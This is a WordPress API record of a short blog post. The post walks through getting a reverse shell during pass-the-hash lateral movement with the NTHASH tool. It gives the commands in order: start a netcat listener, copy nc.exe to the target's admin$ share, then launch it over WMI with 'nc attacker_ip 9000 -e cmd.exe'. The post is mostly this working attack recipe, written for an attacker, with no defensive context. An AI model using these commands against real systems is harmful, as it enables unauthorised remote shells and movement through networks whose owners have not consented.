{"id":2172,"date":"2019-10-28T21:40:42","date_gmt":"2019-10-28T20:40:42","guid":{"rendered":"http:\/\/labalec.fr\/erwan\/?p=2172"},"modified":"2019-10-29T12:39:48","modified_gmt":"2019-10-29T11:39:48","slug":"demonstrating-pth-lateral-movement-with-nthash-part-2","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2172","title":{"rendered":"Demonstrating lateral movement with NTHASH Part #2"},"content":{"rendered":"<p>In a previous <a href=\"https:\/\/labalec.fr\/erwan\/?p=2168\" target=\"_blank\" rel=\"noopener\">article<\/a>, we have seen how to perform lateral movement thru \u00ab\u00a0Pass The Hash\u00a0\u00bb.<\/p>\n<p>Lets imagine that there is no RDP server available on the target but you still need to get a shell on the target.<\/p>\n<p>Lets use a reverse shell i.e the target will connect back to us (the attacker).<\/p>\n<p>Usefull as well if the firewall on the target is allowing only outbound connections.<\/p>\n<p>1.Set a shell with netcat on the attacker host<br \/>\n<strong>nc -L -vv -p 9000<\/strong><\/p>\n<p>2.Copy file to target host (remember, you are using a pth shell with proper logon details).<br \/>\n<strong>copy nc.exe \\\\target\\admin$<\/strong><\/p>\n<p>3.Exec netcat on target host<br \/>\n<strong>NTHASH-win64.exe \/runwmi \/server:target \/binary:nc attacker_ip 9000 -e cmd.exe<\/strong><\/p>\n<p>At this point you will get a shell popup in your listening netcat.<\/p>\n<p>Try a simple whoami for fun.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In a previous article, we have seen how to perform lateral movement thru \u00ab\u00a0Pass The Hash\u00a0\u00bb. Lets imagine that there is no RDP server available on the target but you still need to get a shell on the target. Lets use a reverse shell i.e the target will connect back to us (the attacker). Usefull <a href='https:\/\/labalec.fr\/erwan\/?p=2172' class='excerpt-more'>[&#8230;]<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[118],"tags":[],"class_list":["post-2172","post","type-post","status-publish","format-standard","hentry","category-nthash","category-118-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2172","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2172"}],"version-history":[{"count":5,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2172\/revisions"}],"predecessor-version":[{"id":2201,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2172\/revisions\/2201"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2172"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2172"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2172"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}